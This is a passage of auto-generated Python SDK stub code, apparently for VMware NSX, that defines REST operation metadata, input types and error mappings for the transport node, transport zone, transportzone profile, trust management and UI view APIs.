type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
putontransportnode_input_value_validator_list = [
]
putontransportnode_output_validator_list = [
]
putontransportnode_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/transport-nodes/{target-node-id}/{target-uri}',
path_variables={
'target_node_id': 'target-node-id',
'target_uri': 'target-uri',
},
query_parameters={
},
content_type='application/json'
)
# properties for refreshnodeconfiguration operation
refreshnodeconfiguration_input_type = type.StructType('operation-input', {
'transport_node_id': type.StringType(),
})
refreshnodeconfiguration_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
refreshnodeconfiguration_input_value_validator_list = [
]
refreshnodeconfiguration_output_validator_list = [
]
refreshnodeconfiguration_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/transport-nodes/{transport-node-id}?action=refresh_node_configuration&resource_type=EdgeNode',
path_variables={
'transport_node_id': 'transport-node-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for restartinventorysync operation
restartinventorysync_input_type = type.StructType('operation-input', {
'transport_node_id': type.StringType(),
})
restartinventorysync_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
restartinventorysync_input_value_validator_list = [
]
restartinventorysync_output_validator_list = [
]
restartinventorysync_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/transport-nodes/{transport-node-id}?action=restart_inventory_sync',
path_variables={
'transport_node_id': 'transport-node-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for restoreclusterconfig operation
restoreclusterconfig_input_type = type.StructType('operation-input', {
'transport_node_id': type.StringType(),
})
restoreclusterconfig_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
restoreclusterconfig_input_value_validator_list = [
]
restoreclusterconfig_output_validator_list = [
]
restoreclusterconfig_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/transport-nodes/{transport-node-id}?action=restore_cluster_config',
path_variables={
'transport_node_id': 'transport-node-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for resynchostconfig operation
resynchostconfig_input_type = type.StructType('operation-input', {
'transportnode_id': type.StringType(),
})
resynchostconfig_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
resynchostconfig_input_value_validator_list = [
]
resynchostconfig_output_validator_list = [
]
resynchostconfig_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/transport-nodes/{transportnode-id}?action=resync_host_config',
path_variables={
'transportnode_id': 'transportnode-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'transport_node_id': type.StringType(),
'transport_node': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNode'),
'esx_mgmt_if_migration_dest': type.OptionalType(type.StringType()),
'if_id': type.OptionalType(type.StringType()),
'ping_ip': type.OptionalType(type.StringType()),
'vnic': type.OptionalType(type.StringType()),
'vnic_migration_dest': type.OptionalType(type.StringType()),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/transport-nodes/{transport-node-id}',
request_body_parameter='transport_node',
path_variables={
'transport_node_id': 'transport-node-id',
},
query_parameters={
'esx_mgmt_if_migration_dest': 'esx_mgmt_if_migration_dest',
'if_id': 'if_id',
'ping_ip': 'ping_ip',
'vnic': 'vnic',
'vnic_migration_dest': 'vnic_migration_dest',
},
content_type='application/json'
)
# properties for updatemaintenancemode operation
updatemaintenancemode_input_type = type.StructType('operation-input', {
'transportnode_id': type.StringType(),
'action': type.OptionalType(type.StringType()),
})
updatemaintenancemode_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
updatemaintenancemode_input_value_validator_list = [
]
updatemaintenancemode_output_validator_list = [
]
updatemaintenancemode_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/transport-nodes/{transportnode-id}',
path_variables={
'transportnode_id': 'transportnode-id',
},
query_parameters={
'action': 'action',
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNode'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'deleteontransportnode': {
'input_type': deleteontransportnode_input_type,
'output_type': type.VoidType(),
'errors': deleteontransportnode_error_dict,
'input_value_validator_list': deleteontransportnode_input_value_validator_list,
'output_validator_list': deleteontransportnode_output_validator_list,
'task_type': TaskType.NONE,
},
'disableflowcache': {
'input_type': disableflowcache_input_type,
'output_type': type.VoidType(),
'errors': disableflowcache_error_dict,
'input_value_validator_list': disableflowcache_input_value_validator_list,
'output_validator_list': disableflowcache_output_validator_list,
'task_type': TaskType.NONE,
},
'enableflowcache': {
'input_type': enableflowcache_input_type,
'output_type': type.VoidType(),
'errors': enableflowcache_error_dict,
'input_value_validator_list': enableflowcache_input_value_validator_list,
'output_validator_list': enableflowcache_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNode'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'getontransportnode': {
'input_type': getontransportnode_input_type,
'output_type': type.VoidType(),
'errors': getontransportnode_error_dict,
'input_value_validator_list': getontransportnode_input_value_validator_list,
'output_validator_list': getontransportnode_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'postontransportnode': {
'input_type': postontransportnode_input_type,
'output_type': type.VoidType(),
'errors': postontransportnode_error_dict,
'input_value_validator_list': postontransportnode_input_value_validator_list,
'output_validator_list': postontransportnode_output_validator_list,
'task_type': TaskType.NONE,
},
'putontransportnode': {
'input_type': putontransportnode_input_type,
'output_type': type.VoidType(),
'errors': putontransportnode_error_dict,
'input_value_validator_list': putontransportnode_input_value_validator_list,
'output_validator_list': putontransportnode_output_validator_list,
'task_type': TaskType.NONE,
},
'refreshnodeconfiguration': {
'input_type': refreshnodeconfiguration_input_type,
'output_type': type.VoidType(),
'errors': refreshnodeconfiguration_error_dict,
'input_value_validator_list': refreshnodeconfiguration_input_value_validator_list,
'output_validator_list': refreshnodeconfiguration_output_validator_list,
'task_type': TaskType.NONE,
},
'restartinventorysync': {
'input_type': restartinventorysync_input_type,
'output_type': type.VoidType(),
'errors': restartinventorysync_error_dict,
'input_value_validator_list': restartinventorysync_input_value_validator_list,
'output_validator_list': restartinventorysync_output_validator_list,
'task_type': TaskType.NONE,
},
'restoreclusterconfig': {
'input_type': restoreclusterconfig_input_type,
'output_type': type.VoidType(),
'errors': restoreclusterconfig_error_dict,
'input_value_validator_list': restoreclusterconfig_input_value_validator_list,
'output_validator_list': restoreclusterconfig_output_validator_list,
'task_type': TaskType.NONE,
},
'resynchostconfig': {
'input_type': resynchostconfig_input_type,
'output_type': type.VoidType(),
'errors': resynchostconfig_error_dict,
'input_value_validator_list': resynchostconfig_input_value_validator_list,
'output_validator_list': resynchostconfig_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNode'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
'updatemaintenancemode': {
'input_type': updatemaintenancemode_input_type,
'output_type': type.VoidType(),
'errors': updatemaintenancemode_error_dict,
'input_value_validator_list': updatemaintenancemode_input_value_validator_list,
'output_validator_list': updatemaintenancemode_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'deleteontransportnode': deleteontransportnode_rest_metadata,
'disableflowcache': disableflowcache_rest_metadata,
'enableflowcache': enableflowcache_rest_metadata,
'get': get_rest_metadata,
'getontransportnode': getontransportnode_rest_metadata,
'list': list_rest_metadata,
'postontransportnode': postontransportnode_rest_metadata,
'putontransportnode': putontransportnode_rest_metadata,
'refreshnodeconfiguration': refreshnodeconfiguration_rest_metadata,
'restartinventorysync': restartinventorysync_rest_metadata,
'restoreclusterconfig': restoreclusterconfig_rest_metadata,
'resynchostconfig': resynchostconfig_rest_metadata,
'update': update_rest_metadata,
'updatemaintenancemode': updatemaintenancemode_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.transport_nodes',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _TransportZonesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'transport_zone': type.ReferenceType('com.vmware.nsx.model_client', 'TransportZone'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/transport-zones',
request_body_parameter='transport_zone',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'zone_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/transport-zones/{zone-id}',
path_variables={
'zone_id': 'zone-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'zone_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/transport-zones/{zone-id}',
path_variables={
'zone_id': 'zone-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'is_default': type.OptionalType(type.BooleanType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
'transport_type': type.OptionalType(type.StringType()),
'uplink_teaming_policy_name': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/transport-zones',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'included_fields': 'included_fields',
'is_default': 'is_default',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
'transport_type': 'transport_type',
'uplink_teaming_policy_name': 'uplink_teaming_policy_name',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'zone_id': type.StringType(),
'transport_zone': type.ReferenceType('com.vmware.nsx.model_client', 'TransportZone'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/transport-zones/{zone-id}',
request_body_parameter='transport_zone',
path_variables={
'zone_id': 'zone-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportZone'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportZone'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportZoneListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportZone'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.transport_zones',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _TransportzoneProfilesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'transport_zone_profile': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'TransportZoneProfile')]),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
HasFieldsOfValidator()
]
create_output_validator_list = [
HasFieldsOfValidator()
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/transportzone-profiles',
request_body_parameter='transport_zone_profile',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'transportzone_profile_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/transportzone-profiles/{transportzone-profile-id}',
path_variables={
'transportzone_profile_id': 'transportzone-profile-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'transportzone_profile_id': type.StringType(),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
HasFieldsOfValidator()
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/transportzone-profiles/{transportzone-profile-id}',
path_variables={
'transportzone_profile_id': 'transportzone-profile-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cursor': type.OptionalType(type.StringType()),
'include_system_owned': type.OptionalType(type.BooleanType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'resource_type': type.OptionalType(type.StringType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/transportzone-profiles',
path_variables={
},
query_parameters={
'cursor': 'cursor',
'include_system_owned': 'include_system_owned',
'included_fields': 'included_fields',
'page_size': 'page_size',
'resource_type': 'resource_type',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'transportzone_profile_id': type.StringType(),
'transport_zone_profile': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'TransportZoneProfile')]),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/transportzone-profiles/{transportzone-profile-id}',
request_body_parameter='transport_zone_profile',
path_variables={
'transportzone_profile_id': 'transportzone-profile-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'TransportZoneProfile')]),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'TransportZoneProfile')]),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportZoneProfileListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'TransportZoneProfile')]),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.transportzone_profiles',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _TrustManagementStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/trust-management',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TrustManagementData'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.trust_management',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _UiViewsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for create operation
create_input_type = type.StructType('operation-input', {
'view': type.ReferenceType('com.vmware.nsx.model_client', 'View'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
